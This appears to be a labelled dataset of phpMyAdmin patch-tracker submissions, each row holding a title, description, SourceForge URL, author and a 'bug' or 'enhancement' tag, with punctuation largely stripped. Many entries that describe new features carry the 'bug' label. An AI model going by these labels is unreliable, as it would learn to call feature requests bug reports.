Bug reported https sourceforge.net tracker ?func=detail aid=3174962 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin patches 586 Original author ravindhranath","bug"
"24444","4551","minor re order to Documentation.html.
This patch moves an item down to maintain consistency with config.default.php and to keep like items grouped together.
Generated with git format patch which seems to be more desirable than git diff, at least based on the git documentation I ve found.
Original URL https sourceforge.net p phpmyadmin patches 587 Original author ibennetch","bug"
"24444","4552","Fixed Partial list of users and new users.
When a new user is added, the list doesn t get updated and link to the added username s initial remains blank.
This patch fixes it.
Original URL https sourceforge.net p phpmyadmin patches 588 Original author ravindhranath","bug"
"24444","4553","inline edit no option for closing edit box.
consider the scenario click on inline edit for a particular row, but now I don t wish to change any data for that row, but there is no option for closing the edit boxes that now appear.
Original URL https sourceforge.net p phpmyadmin patches 589 Original author onebighack","bug"
"24444","4554","change password problematic.
https sourceforge.net tracker ?func=detail aid=3202516 group id=23067 atid=377408 attached is the diff file which fixes this issue, please test it.
Original URL https sourceforge.net p phpmyadmin patches 590 Original author onebighack","bug"
"24444","4555","Patch for mass table prefix change ID 2021981.
I ve added 3 options in the dropbox where we can Drop analyze optimize table in db structure.php).
The following options are handled in the mult submit.inc.php file.
1) Add prefix to tables a textbox to type the prefix to add 2) Replace table prefix Replace the prefix 2 textboxex FROM and TO) 3) Copy tables with different prefix Similar to above but tables will be copied Original URL https sourceforge.net p phpmyadmin patches 592 Original author ayax88","bug"
"24444","4556","Use pgettext for chart type.
They are different to transrate the least Japanese).
Column only needs to use pgettext now, other labels use it just in case.
Original URL https sourceforge.net p phpmyadmin patches 695 Original author rdeq08","bug"
"24444","4557","Suggestion for navigation headers.
An attempt to unclutter the navigation buttons and Show dialog.
Original URL https sourceforge.net p phpmyadmin patches 593 Original author lem9","bug"
"24444","4558","copy table data missing SET SQL MODE.
For the same reason SET SQL MODE= NO AUTO VALUE ON ZERO is included in export import operations it needs to precede the INSERT INTO statement that copies table data.
Here s a diff of my modification that solves the problem.
======================================== diff bu Table.class orig.php Table.class.php Table.class orig.php 2011 12 01 11 21 14.000000000 0600 Table.class.php 2011 12 13 03 41 06.536499576 0600 775,6 775,10 Copy the data unless this is a VIEW if what == data || what == dataonly ) !
PMA Table isView target db, target table)) \{ \ sql set mode = \ SET SQL MODE= NO AUTO VALUE ON ZERO ; \ PMA DBI query sql set mode); \ GLOBALS[ sql query ] .= \n\n .
sql set mode .
; ; sql insert data = INSERT INTO .
target .
SELECT FROM .
source; PMA DBI query sql insert data); ======================================== Not that it matters much in this case, here are relevant apps and versions Linux lindev2 3.1.0 1 686 pae 1 SMP Mon Nov 14 08 24 20 UTC 2011 i686 GNU Linux PHP extension mysqli PHP 5.3.8 MySQL sever 5.1.52 MySQL client 5.1.58 Apache 2.2.21 Debian) Original URL https sourceforge.net p phpmyadmin patches 698 Original author glennh satx","bug"
"24444","4559","Asking before leaving descigner rfe 3073247).
When leaving the designer page, it now asks for user confirmation if the layout is modified and unsaved.
It is working for Google Chrome, Mozilla Firefox, IE 7 8.
Original URL https sourceforge.net p phpmyadmin patches 594 Original author atul5","bug"
"24444","4560","User prefs and Iconic settings ID 3216140.
I have added some boolean type checking and casting in save ) and validateSelect ) function in FormDisplay.class.php).
When saving Settings Main Frame Browse Mode Iconic navigation bar = Yes Iconic table operations = Yes the Iconic configuration value is stored as integer 0, 1, or string both .
Not false, true, or both .
The rest of the code, use strict comparison === and !=== to boolean true or false), so sometimes the comparison failed.
Changes in save ) convert string 0 and 1 to false and true for NavigationBarIconic and PropertiesIconic).
validateSelect ) make sure that boolean value not converted to integer.
Original URL https sourceforge.net p phpmyadmin patches 595 Original author arisferyanto","bug"
"24444","4561","POST inline edit data only if needed.
Please test this against current master.
Original URL https sourceforge.net p phpmyadmin patches 596 Original author lem9","bug"
"24444","4562","Faster AJAX Messages.
I find AJAX loading messages http www.tyron.at tmp pma ajax msg.png) very workflow disrupting as they slide into my working area stay way longer than it takes to load the actual page and take some time to slide up again.
I have looked in the code and to my surprise is see the messages boxes only disappear after a fixed timer of 5 seconds sliding time excluded), effectively preventing you from continue working those 5 seconds on every request.
I don t like my time taken for unneeded waiting Why not make them disappear once the data is loaded?
And secondly make them fade in out otherwise you couldn t read it anyway as the data loads much faster) The supplied patch implements both in a few lines of code for adding fields in a new table.
I can implement it for all the other functions as well if my patch code is good enough to be merged to master.
Original URL https sourceforge.net p phpmyadmin patches 597 Original author anonymous","bug"
"24444","4563","DB specific privileges un)check all AJAX response.
Fixes bug 3188444 Hopefully I ve done everything correctly in terms of submission procedure.
Original URL https sourceforge.net p phpmyadmin patches 598 Original author callmelee","bug"
"24444","4564","Fix for the un)checkall butons in privileges.
Hi, I had a go at fixing the checkaII bug in the user privilege dialogs bug 3188444).
It occurs because every element id on the page must be unique, but all the forms are assigned the same id, namely addUsersForm .
The Add a new User dialog is also affected by this, as well as all db specific permission dialogs.
I have created a patch that appends a large random number to the ids of forms.
While maybe not the best solution, it does work.
A better way to fix this may be to instead use a counter or maybe even the token), but I didn t manage to implement that.
Please find the patch attached.
Regards, Rouslan Original URL https sourceforge.net p phpmyadmin patches 599 Original author roccivic1","bug"
"24444","4565","Proof of Concept Visualizing GIS data.
This patch makes it able to visualize GIS data.
This was done using the flot library.
Please note that flot was chosen simply because this is just a proof of concept and I was playing around with it for some other task.
I m open to consider the pros and cons of other options and chose the most suitable library for the final implementation Here I attach two patch files, and a suitable data set to see how this is working Features 1\.
Visualize GIS data link is displayed in Query results options pane ONLY for query results that has atleast one geometric column.
2\.
Visualization can be zoomed in, zoomed out and panned thanx to flot) 3\.
If there are more than one geometric columns in the results, the user can chose which column to be used for th visualization 4\.
User can chose out of non geometric columns a label column, which can be used for either tooltips or legend to be implemeted) 5\.
User can resize the visualization.
Known limitations 1\.
Here I have implemented this only for multipolygons.
2\.
I m yet to handle the case where there is void area inside a polygon 3\.
function PMA GIS modify query ) should be made more robust.
Enhancements 1\.
Can be extended to other geometric types.
Extending to other types is a simple task.
Would love to do so if you are happy with the patch.
2\.
As mentioned earlier tooltips or legend using label column would be nice.
Original URL https sourceforge.net p phpmyadmin patches 600 Original author madhuracj","bug"
"24444","4566","Use pgettext for trigger action time.
This word is defferent to tarnslate the least Japanese).
Original URL https sourceforge.net p phpmyadmin patches 713 Original author rdeq08","bug"
"24444","4567","Transform old popup to ajax popup.
Hi, I did a patch to resolve the feature 3187076 from the feature request tracker.
I did it from the master branch in the GIT repository.
best regards, Benoit Original URL https sourceforge.net p phpmyadmin patches 601 Original author bestben","bug"
"24444","4568","Skip dumping data comment if table is empty.
Please find attached a proposed fix for feature request 3163355.
I did some basic tests and it works as expected.
The solution is very simple and only involves moving the code that creates the comment a bit further down in the function, when we know what row we are on. )
Regards, Rouslan.
Original URL https sourceforge.net p phpmyadmin patches 602 Original author roccivic1","bug"
"24444","4569","error in updating using inline edit.
Changes in the row data are not reflected in where clause for that row, when using inline edit.
I have attached a diff file to correct this bug, please test it.
Original URL https sourceforge.net p phpmyadmin patches 603 Original author onebighack","bug"
"24444","4570","Activate codemirror in querywindow.
Codemirror gets activated in querywindow to have the full effect of syntax highlightning in all places.
Original URL https sourceforge.net p phpmyadmin patches 715 Original author ekitomat","bug"
"24444","4571","Contest 3 SQL export option TRUNCATE TABLE before INSERT .
https sourceforge.net tracker ?func=detail aid=3305569 group id=23067 atid=377411 Added SQL export option TRUNCATE TABLE before INSERT INTO .
Original URL https sourceforge.net p phpmyadmin patches 721 Original author mynetx","bug"
"24444","4572","Patch to fix Bug 3187428.
In the Table Operations Tab when user moves copies Maintains check repair optimize analyze) the table, it now gets back to the Operations Tab again after execution.
Original URL https sourceforge.net p phpmyadmin patches 604 Original author atul5","bug"
"24444","4573","Patch for bug 3249704 Can t add a new user.
Please find attached a patch to fix bug 3249704. which was introduced in patch 3246887.
I tried it and it fixes the problem.
I also grepped for any other references to the ID in question and nothing else came up.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 605 Original author roccivic1","bug"
"24444","4574","Show hide db search results.
This contains the Show Hide search results criteria for the database search Original URL https sourceforge.net p phpmyadmin patches 606 Original author lgtkaushalya","bug"
"24444","4575","Fix for the DB specific privileges and Ajax ID 3188444.
I have added the initialization of database specific variables if the db name set in request.
That change will fix the bug 3188444.
Original URL https sourceforge.net p phpmyadmin patches 607 Original author anonymous","bug"
"24444","4576","Fix for bug 3242060 Query Statistics add to over 250 .
Hi, Please find attached a patch to fix for bug 3242060.
I found that factor that is used to work out the percentage, given the amount of hits, was incorrect and was leading to this issue.
And so, I corrected this calculation.
I tested the fix and the percentages now add up to 100.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 608 Original author roccivic1","bug"
"24444","4577","Added more documentation links to SQL parser.
I added documentation links to almost every SQL sentence in SQL pretty printer Original URL https sourceforge.net p phpmyadmin patches 609 Original author gandalfml","bug"
"24444","4578","Transforms the Add new user link.
This patch transforms the add user link in the db privilege specific tab.
Instead of changing the tab, a Popup appear like in the normal privilege tab.
Original URL https sourceforge.net p phpmyadmin patches 613 Original author bestben","bug"
"24444","4579","3188444 part 2) DB specific privileges and Ajax.
First of all, to reproduce the problem I ve been looking in all the wrong places first) 1\.
select a database 2\.
go to privileges tab 3\.
click edit privileges near a user 4\.
alter some privileges and click go.
5\.
the AJAX request is fired and the new privileges are saved, however the old privileges are still displayed in the overview table.
The actual problem is that the Javascript code that is in charge of updating the privilege values in the table looks for a form with id= usersForm , but there is no such form on the page in question only found in the global privileges page).
So the solution is to wrap the user overview table inside some relevant form tags.
Please find a patch attached that fixes this issue.
I did some basic testing and it works fine.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 614 Original author roccivic1","bug"
"24444","4580","bug 3204461 Continue insertion and ENUM.
The problem with this issue is that the value attribute is removed for all cloned textfields by JavaScript.
In the solution that I propose, a textfield is tested for whether it belongs to an ENUM column and, if yes, the value attribute is not removed from this element.
Please find the patch attached below.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 615 Original author roccivic1","bug"
"24444","4581","Better AJAX message animation.
I ve found that in the latest git, some of the AJAX message animation is not shown correctly if it has been shown some times on the same page.
Way to reproduce this with the ajax option enabled in the preferences) 1\.
on the home page, click Privileges menu 2\.
click Add a new User or Edit Privileges link, and it will display a new popup dialog 3\.
close the popup dialog by pressing Esc or click close button on the top right corner 4\.
repeat step 2 and 3 until several times for me, it is about 3 5 times), and you ll see that the AJAX loading message will never show up again even the AJAX request is on progress After some googlings, I found that jQuery clearQuery function used in latest git, will only stop current animation and remove queued animation as well.
But, left current animation value unchange.
i.e., unfinished fadeOut animation, will left opacity attribute lt; 1 and gt; 0) This is what creates the not showing up AJAX message.
I suggest to use stop true, true) function [1] to solve this.
[1] http api.jquery.com stop Original URL https sourceforge.net p phpmyadmin patches 616 Original author arisferyanto","bug"
"24444","4582","Impoved fix for issue 1 in bug 3204461.
Please find attached a patch to fix issue 2 from bug 3204461.
I had previously submitted a fix for this bug patch 3261058), but after further testing I was not satisfied with the results, so this patch supersedes my previous effort.
I found that the problem with the datepickers is that after the relevant DOM structures are clone in jQuery, only the name attributes of textfileds are updated, but not the IDs, but we are not allowed to have duplicate IDs for elements on a page.
So this new patch will first destroy all the datepickers on the page, then update the IDs of the relevant textfields on the page and finally reattach the datepickers to every datefield and datetimefield.
This resolves all issues of the datepickers not inserting data in the correct format into the inputs, as well as the output of datepickers being copied to the wrong input boxes.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 617 Original author roccivic1","bug"
"24444","4583","Patch for feature request in 3177495.
This patch provides a new configuration option, which hides the table maintainance options, like optimizing, repairing, etc.
If someone initiates such a maintainance task, it may turn big databases slow for a long time, until the task is totally finished that s why this is desired.
Original URL https sourceforge.net p phpmyadmin patches 618 Original author gaborkovesdan","enhancement"
"24444","4584","layout of edit Fix for issue 3271928.
Please find attached a patch that fixes issue 3271928.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 619 Original author roccivic1","bug"
"24444","4585","Patch for feature 1305814.
Hi.
This is my first patch.
I tried to implement the feature 1305814.
I also updated some .css files.
Original URL https sourceforge.net p phpmyadmin patches 620 Original author silviojr","bug"
"24444","4586","XSS vulnerability in tracking tab.
Lines 393 to 395 and 517 to 520 data is echoed from REQUEST without sanitisation.
Fixed this with a simple htmlentities; Original URL https sourceforge.net p phpmyadmin patches 745 Original author pauldsfr","bug"
"24444","4587","rare ZIP archive dates generate error.
Minor fix for rare occurrence zipping files with dates lt;1981 generates the following errors PHP Notice Uninitialized string offset 6 in home carcich phpmyadmin libraries zip.lib.php on line 100 PHP Notice Uninitialized string offset 7 in home carcich phpmyadmin libraries zip.lib.php on line 100 This does occasionally happen.
Test with this code send stdout to x.zip) lt;?php fn= zip.lib.php ; require once fn ; zf = new zipfile; zf gt; addFile file get contents fn), fn, 315640920); 315640920 is 1980 01 02 01 02 echo zf gt; file ); ?
gt; N.B.
Also submitted with patch 3271853; separated out here to isolate bug and feature request Original URL https sourceforge.net p phpmyadmin patches 621 Original author drbitboy","bug"
"24444","4588","send ZIP archive to stdout.
This patch adds the feature for zip.lib.php to send the ZIP archive contents to STDOUT instead of returning them as a string.
The advantage is that this method uses far less memory php.ini memory limit) and is less likely to generate an error when run in a web server cgi script.
For example, with memory limit = 16M in php.ini, the largest ZIP archive that can be written with the existing code is about 5MB; with the modified code the largest ZIP archive that could be written with the patched code could easily reach the 4GiB limit of the 32 bit ZIP format.
This patch supersedes patch 3271853.
Original URL https sourceforge.net p phpmyadmin patches 623 Original author drbitboy","bug"
"24444","4589","inline link goes missing after table sort.
First of all, this is not a bug.
Whenever a user sorts a table, based on a particular column, by clicking on the column header link), this action removes the inline link just below the sql query.
Although this is actually what it should do,since this is an ajax call.
But since the query being run is a select with an ORDER BY clause it does not make sense to remove the inline link.
Original URL https sourceforge.net p phpmyadmin patches 624 Original author onebighack","bug"
"24444","4590","Patch for another issue in bug 3188444.
This is for issues 2 in the bug 3188444 I previously already submitted a patch for issue 2 in the same bug, but that turned out to be a completely different issue).
Issue description when a privilege is changed and saved, the User overview panel shows wrongly this privilege in the list of global privileges but it s not really there as can be proved by reloading the page).
To reproduce 1\.
go to the global privilege list 2\.
click on edit privileges for a user 3\.
scroll down in the new window and click on edit privileges Database specific privileges you might have to add some first) 4\.
alter privileges and submit the form 5\.
close the jQuery dialog 6\.
take note of the privileges for the selected user in the list 7\.
reload page Please find attached a patch to fix this.
The fix is accomplished by passing an extra variable in the JSON data during the AJAX request, that tells us whether the privileges that were changed were global or database specific.
This information is then used to only reload the privileges when necessary.
I did all the basic tests and the fix seems to work great.
I tried both, manipulating the privileges from the global privileges list and also from the database specific list not the AJAX one, but the one that you can access through the privileges tab when you are in a database).
Please let me know what you make of this.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 625 Original author roccivic1","bug"
"24444","4591","Fix for bug in Add User.
How to reproduce the bug javascript must be on) click on privileges tab add user choose a username already taken in my example, i used the username silviojr that already exists in my db) A not very explanatory message will pop up undefined request ).
I guess that is not the expected behavior.
I uploaded two images one shows what happens now, and and the other one shows what my patch proposes to happen.
Original URL https sourceforge.net p phpmyadmin patches 626 Original author silviojr","bug"
"24444","4592","inline edit link displayed but doesn t work.
Steps to reproduce 1) Write an incorrect create procedure query using inline edit.
In my case I used create procedure chk proc IN int 11) a,IN enum small , large ) b) ... 2) This leads to the error message , with the inline edit link for query being displayed but it does not work.
Original URL https sourceforge.net p phpmyadmin patches 628 Original author onebighack","bug"
"24444","4593","Display the last 10 used databases 3141575.
This patch implements feature 3141575 In the database dropdown selection menu, there will be a new optgroup containing the last 10 accessed databases.
Underneath it, another optgroup called Databases will contain all the databases as per normal.
The number of databases to be displayed can be configured in config.inc.php by editing the variable cfg[ recent dbs nr ].
There are still 3 things that need to be done here add the translation for Recent dbs add the cfg rcent dbs nr to the default config the sorting is a bit weird sometimes it ASC, sometimes DESC) This feature is closely related to my GSoC proposal [1].
It s mainly a proof of concept of how I will implement the feature, it can be polished a bit right now but it works as intended.
You must define the cfg variable in config.inc or else it will be set to 0 and no databases will appear.
A possible check to see if it s defined can be written, but I guess putting the cfg in config.default is a better solution.
Let me know what you all think.
[1] http www.google melange.com gsoc proposal review google gsoc2011 andreipicus 1 Original URL https sourceforge.net p phpmyadmin patches 630 Original author anonymous","enhancement"
"24444","4594","jQuery UI Dialog link color, makes it more readable.
Patch for Feature Requests 3187074 https sourceforge.net tracker ?func=detail aid=3187074 group id=23067 atid=377411 Sample patch for original and pmahomme themes.
Original URL https sourceforge.net p phpmyadmin patches 632 Original author back2arie","enhancement"
"24444","4595","Drizzle) Listing Change table structure.
Change SHOW FULL FIELDS to SHOW COLUMNS if using Drizzle.
Patch is here https github.com back2arie pma drizzle commit 718de2bb8b4a438fd7ab1a31239b47d18376908f.patch A working demo is here http idforge.or.id pma drizzle Thanks Original URL https sourceforge.net p phpmyadmin patches 633 Original author back2arie","bug"
"24444","4596","AJAX Loading message misaligned in IE9.
This patch fix the IE alignment problem of AJAX Loading message in both original and pmahomme theme.
IE9 seems not supporting CSS margin 0 auto without specifying width .
In both themes css, there are already exist min width 70px and max width 350px , but it doesn t work with IE9.
And I never saw any AJAX message to have a width of 70px.
I always see it in 350px width.
So, in this patch, I replaced min width and max width with width 350px .
Other themes css may need to be fixed also.
Original URL https sourceforge.net p phpmyadmin patches 635 Original author arisferyanto","bug"
"24444","4597","IE9 theme compatibility blurry borders.
Another partial fix for the IE9 theme compatibility ID 3281324 [0] Borders in IE9 look blurry due to specifying sizes in em and round buttons have backgrounds outside of their black frame see screenshot 1).
This patch fix blurry borders in IE9 using the link [1] suggestion from crackpl) and link [2].
I also remove the underlined link when hovering Create table button, because the underline is not drawn correctly in firefox and safari.
[0] https sourceforge.net tracker ?func=detail atid=377408 aid=3281324 group id=23067 [1] http css3wizardry.com 2010 10 29 css gradients for ie9 [2] http abouthalf.com 2010 10 25 internet explorer 9 gradients with rounded corners Original URL https sourceforge.net p phpmyadmin patches 636 Original author arisferyanto","bug"
"24444","4598","Remove underline when hovering Create table .
In firefox and safari, the underline link when hovering Create button in pmahomme is not drawn correctly.
This patch removes the underline when hovering the button.
Original URL https sourceforge.net p phpmyadmin patches 637 Original author arisferyanto","bug"
"24444","4599","Delete button for tables tracking.
This is patch for this feature request https sourceforge.net tracker ?func=detail aid=3032531 group id=23067 atid=377411 What is added in fact adbility to delete any tracked query for tables What was added in code delete button into tracking table function for changing tracking data in Tracker.class.php Original URL https sourceforge.net p phpmyadmin patches 639 Original author bumbualex","bug"
"24444","4600","Making database operations tab more compact.
Attached patch organizes the sections in database operations tab in to two columns, as in table operations tab, making the page more compact.
Original URL https sourceforge.net p phpmyadmin patches 640 Original author madhuracj","bug"
"24444","4601","GIS data.
This sql file contains GIS data which can be used to test the features of GSoC project OpenGIS support for phpMyAdmin .
Original URL https sourceforge.net p phpmyadmin patches 644 Original author madhuracj","enhancement"
"24444","4602","Patch for feature request 3141575.
I tried to implement feature requested here https sourceforge.net tracker ?func=detail aid=3141575 group id=23067 atid=377411 With this patch phpMyAdmin is showing list of last 10 used databases for logged user on main page.
Feature can be turned on and off by cfg[ Servers ][ i][ dbhistory ] = pma db history ; in config.inc.php.
User has to create the needed table with the script create tables.sql.
User has to create a pma user and give access to this table.
Alternatively you can pull phpmyadmin with this patch from branch db I made http repo.or.cz w phpmyadmin last10db.git This is my firs finished patch here so any opinion is appreciated.
Original URL https sourceforge.net p phpmyadmin patches 645 Original author louisha","bug"
"24444","4603","Fix for bug 3301452 Clear button does not work.
Please find attached a fix for bug 3301452 Clear button does not work in the SQL tab if a table is not selected.
There also a further patch to correct the indentation of some JS code that was near the code that I worked on for the other patch.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 646 Original author roccivic1","bug"
"24444","4604","Fix Show a translated Label.
A Label is not translated, however it has defined in .po files.
The Label is Column names in Importing into the table , when selecting CSV Format.
Original URL https sourceforge.net p phpmyadmin patches 647 Original author rdeq08","bug"
"24444","4605","Add gettext wrappers around a message.
There are a message without gettext wrapper in Import Format , when selecting CSV Format.
Original URL https sourceforge.net p phpmyadmin patches 648 Original author rdeq08","bug"
"24444","4606","Ctrl Enter to submit SQL input.
Simple addition to let ctrl enter cause a submit of SQL query, as opposed to requiring a mouse click on the go button.
Original URL https sourceforge.net p phpmyadmin patches 649 Original author garethop","bug"
"24444","4607","Checkbox to have SQL input remain.
A simple checkbox for the user to toggle to have the SQL input remain when query is AJAX submitted, as opposed to hiding.
This setting can be turned on by default in the config.inc.php, or just left as its default off.
I find this useful for when I am running queries over and over with slight changes and get sick of clicking with the mouse just to go back to typing some more.
Original URL https sourceforge.net p phpmyadmin patches 650 Original author garethop","bug"
"24444","4608","Define a Label that was missing.
A defined Label is missing in SQL tab of Export settings.
I thought the same label as Data dump options of custom Export.
Original URL https sourceforge.net p phpmyadmin patches 651 Original author rdeq08","bug"
"24444","4609","Redefine a label that was wrong.
A defined label is wrong in Structure of SQL tab Export settings).
I thought the same label as Object creation options of custom Export.
Original URL https sourceforge.net p phpmyadmin patches 653 Original author rdeq08","bug"
"24444","4610","show checkboxes when there are no row links.
Please find attached a proposed fix for bug 3302961.
The patch does not only contain the fix for showing the checkboxes when there are no row action links in table browse mode, but also changes the the way that the row action links are configured.
The two directives ModifiyDeleteAtLeft and ModifyDeleteAtRight are gone and are replaced by RowActionLinks directive, which is now displayed as a dropdown list in the configuration GUI.
Original URL https sourceforge.net p phpmyadmin patches 654 Original author roccivic","bug"
"24444","4611","Inline Edit does not escape backslash.
bug 3309240 Inline Edit does not escape backslash Original URL https sourceforge.net p phpmyadmin patches 655 Original author mynetx","bug"
"24444","4612","Fix for Some tooltips don t disappear.
For some reason qTip is not catching the unfocus even, so the tooltip should be merely hidden after a certain amount of time has passed.
Please find patch attached.
Original URL https sourceforge.net p phpmyadmin patches 656 Original author roccivic","bug"
"24444","4613","CharTextareaRows is not respected.
First a bug cfg[ CharTextareaRows ] isn t respected since the height of almost) all textareas are computed in theme right.css.php) based only on cfg[ TextareaRows ].
I have attached a patch for this bug.
I m wondering why the textarea height is set in the CSS at all since all textareas have the rows attribute set?
Is it browsr compatibility issue.
Is bug 1664240 relevant.)
In addition, I suggest adding another variable cfg[ QueryTextareaRows ] since in our experience, a SQL query always needs a big textarea.
Editing text data in a table row inline or normal) is normally fine with a smaller textarea.
PS!
Why do the CSS produced by theme right.css.php override the rows set in the textareas?
Is it a browser issue?
Original URL https sourceforge.net p phpmyadmin patches 658 Original author hansfn","bug"
"24444","4614","Fix for bug 3316958.
Please find a proposed fix for this issue attached.
The problem here is Once an AJAX message is created, a callback is attached to it to hide it after the specified timeout.
However, if another message is created shortly after, the old callback is not destroyed jQuery doesn t allow that anyway) and so the second message is hidden by the callback of the first message.
Then, when the timeout triggers the callback for the second message, it silently fails.
My solution is to create a new DOM node for each message.
Then to hide the old nodes when a new message is created and use the callback to destroy the expired nodes.
I think that it s cute that whoever wrote the PMA ajaxShowMessage function was trying to save us the overhead of creating new DOM nodes, and it would have worked if all we had to deal with were blocking function calls, but the messages are mostly callback driven, so that method is not suitable in my opinion.
Original URL https sourceforge.net p phpmyadmin patches 659 Original author roccivic","bug"
"24444","4615","Fix for bug 3313875.
The problem is that if you have more than 50 users, the Add new user link always load into the same window no ajax).
The problem is that this window does not have the generate password option.
Looking in the code, the part that only showed the link was missing the conditional class which transforms the link into a ajax window.
This patch adds that again.
Original URL https sourceforge.net p phpmyadmin patches 660 Original author middag","bug"
"24444","4616","sortable current server drop down list.
i found no way to sort the drop down list for server selection.
my solution in libraries select server.lib.php 48,53d47 lt; function cmp a, b) lt; \{ lt; return strcmp a[ verbose ], b[ verbose ]); lt; \} lt; uasort GLOBALS[ cfg ][ Servers ], cmp ); Original URL https sourceforge.net p phpmyadmin patches 662 Original author mangar","bug"
"24444","4617","Favorite SQL query with the same name as the table broken.
In previous version I have set up favorites queries with the same name as the table name, for ex to change sort order automatically when clicking browse button.
Now it doesn t work Original URL https sourceforge.net p phpmyadmin patches 663 Original author freeman3","bug"
"24444","4618","Fix for bug 3323060.
Please find attached a patch that fixes bug 3323060 Original URL https sourceforge.net p phpmyadmin patches 664 Original author roccivic","bug"
"24444","4619","Fix for bug 3323101.
Please find attached a fix for bug 3323101 Original URL https sourceforge.net p phpmyadmin patches 665 Original author roccivic","bug"
"24444","4620","Fix for bug 3353856.
Please find attached a proposed solution to bug 3353856.
The idea here is to simply override the styles set by jquery ui 1.8.custom.css with another CSS file jquery ui 1.8.override.css .
Original URL https sourceforge.net p phpmyadmin patches 667 Original author roccivic","bug"
"24444","4621","ok3.5.0) Fix for bug 3354356.
Please find attached a fix for bug 3354356 Original URL https sourceforge.net p phpmyadmin patches 668 Original author roccivic","bug"
"24444","4622","ESRI shape files to test the new import feature.
Attached files can be used to test the new feature Import GIS data from ESRI shape files as http demo.phpmyadmin.net gsoc madhura.
Original URL https sourceforge.net p phpmyadmin patches 669 Original author madhuracj","bug"
"24444","4623","No success error feedback from certain query.
Create following table CREATE TABLE IF NOT EXISTS `test` `test` datetime NOT NULL, `idx` int 11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; then go to the SQL tab and execute the following INSERT INTO `test` VALUES 0000 00 00 00 00 00 , 1); INSERT INTO `test` VALUES 0000 00 00 00 00 00 , 2); INSERT INTO `test` VALUES 0000 00 00 00 00 00 , 3); INSERT INTO `test` VALUES 0000 00 00 00 00 00 , 4); INSERT INTO `test` VALUES 0000 00 00 00 00 00 , 5); This will cause the loading message to appear and disappear a second later with no feedback of whether the query was successful Original URL https sourceforge.net p phpmyadmin patches 670 Original author tyronx","bug"
"24444","4624","Fix for bug 3374802.
Please find attached a patch that fixes bug 3374802, this should be applied to QA 3 4 only, since the bug in question does not exist in master.
Original URL https sourceforge.net p phpmyadmin patches 671 Original author roccivic","bug"
"24444","4625","PHP Array export might generate invalid php code.
Current Problems Invalid variable names xc2xb40 `is valid in SQL, but not in PHP) Unescaped strings columns in array might be unescaped, because column names like `id ` are allowed in SQL) You can pull my fix from git github.com csware phpmyadmin.git php export fixes Original URL https sourceforge.net p phpmyadmin patches 672 Original author csware","bug"
"24444","4626","Inline editing does not work if query is too long.
The inline edit button does not work if query is too long.
Fix git github.com csware phpmyadmin.git fix inlineedit Original URL https sourceforge.net p phpmyadmin patches 673 Original author csware","bug"
"24444","4627","Add edit view link.
It would be nice to have an edit view link on the tbl structure page.
This way it s possible to see the query behind it or even change it more easily.
I implemented a first draft.
Pull git github.com csware phpmyadmin.git edit view Original URL https sourceforge.net p phpmyadmin patches 674 Original author csware","bug"
"24444","4628","unknown table status Create time on dispalying view.
1\.
displaying a view display tbl) shows the error unknown table status Create time 2\.
PMA Table sGetStatusInfo error message unknown table status seems to be not localized Original URL https sourceforge.net p phpmyadmin patches 676 Original author csware","bug"
"24444","4629","Typo.
Fixed a typo found while translating Original URL https sourceforge.net p phpmyadmin patches 677 Original author csware","bug"
"24444","4630","Drop ZZ output.
phpMyAdmin outputs ZZ on some queries which breaks the layout Original URL https sourceforge.net p phpmyadmin patches 678 Original author csware","bug"
"24444","4631","original output doesn t have rounded buttons.
original output doesn t have rounded buttons btw.
is there any better way to provide pull requests or patches?
Original URL https sourceforge.net p phpmyadmin patches 679 Original author csware","bug"
"24444","4632","Fixes InnoDB comment display with tool tip aliases.
When using ShowTooltipAliasTB = true, the extra InnoDB free... comments stored by MySQL into InnoDB table comments causes phpMyAdmin to display incorrect information in the table structure page.
This should fix that.
Hopefully without causing any additional problems ) Original URL https sourceforge.net p phpmyadmin patches 680 Original author ibennetch","bug"
"24444","4633","Too much text in the interface.
I think icons should not be accompanied by text that much, so I remove some text output.
Original URL https sourceforge.net p phpmyadmin patches 681 Original author anderslinden2","bug"
"24444","4634","Stick table tools to top of page on scroll.
Stick table tools and navigation to top of page on scroll.
Realized as function on 2sec timeout because window).scroll don t work in Opera.
Original URL https sourceforge.net p phpmyadmin patches 682 Original author dylfin","bug"
"24444","4635","Improving field size for character columns.
Not sure how much bug quality this has but worth a shot...
I ll explain as best I can.
I have always been annoyed by the super short input fields shown when editing a char or varchar field of a table and was trying to fix it.
I am talking strictly about the physical size of the area in the web browser being too short, not it s ability to store longer strings.
At approx line 919 of tbl change.php, there s this field size should be at least 4 and max 40 fieldsize = min max field[ len ], 4), 40); Not sure why someone arbitrarily chose 40 as the size limit for an input box but it s too damn short by today s standards.
cfg[ CharTextareaCols ] might be a sensible limit if it was documented that way.
That would work just great except that field[ len ] is exactly 3x the length for any char or varchar field.
I tried to drill down to the source of the triple size reporting but function PMA DBI field len ) is just a dumb wrapper to one of three underlying engine field length calls.
I don t know if this is intentional to make sure all browsers display a long enough box, but the hard limit of 40 characters kinda defeats that purpose.
I compile all my own stuff so maybe this part is a bug on my system alone.
Or maybe its a multilingual hack.
I didn t look all to hard to find the correct value.
table fields[ i][ Type ] has the correct field size appended after the field type in brackets ..where does that come from?).
[Before someone asks, cfg[ CharEditing ] = textarea is a crappy fix because that makes all my char fields long and boxy regardless of size.]
This is my small fix to get some half decent sized text fields.
YMMV depending on browser.
field size should be at least 4 and max CharTextareaCols char, varchar are reported at 3x the size if stripos table fields[ i][ Type ], char ) === 0 || stripos table fields[ i][ Type ], varchar ) === 0) fieldsize = min max field[ len ] 3, 4), cfg[ CharTextareaCols ]); \} else \{ fieldsize = min max field[ len ], 4), cfg[ CharTextareaCols ]); \} Thanks, Sean Original URL https sourceforge.net p phpmyadmin patches 685 Original author seanster","bug"
"24444","4636","Quick fix for bug 3390832.
This is a quick fix for bug 3390832.
Although this does not fully solve the problem, it saves the user from awkward position described in the bug report, making it possible for him to navigate into the pages of the search results.
I d like to know your opinion on this.
Original URL https sourceforge.net p phpmyadmin patches 686 Original author madhuracj","bug"
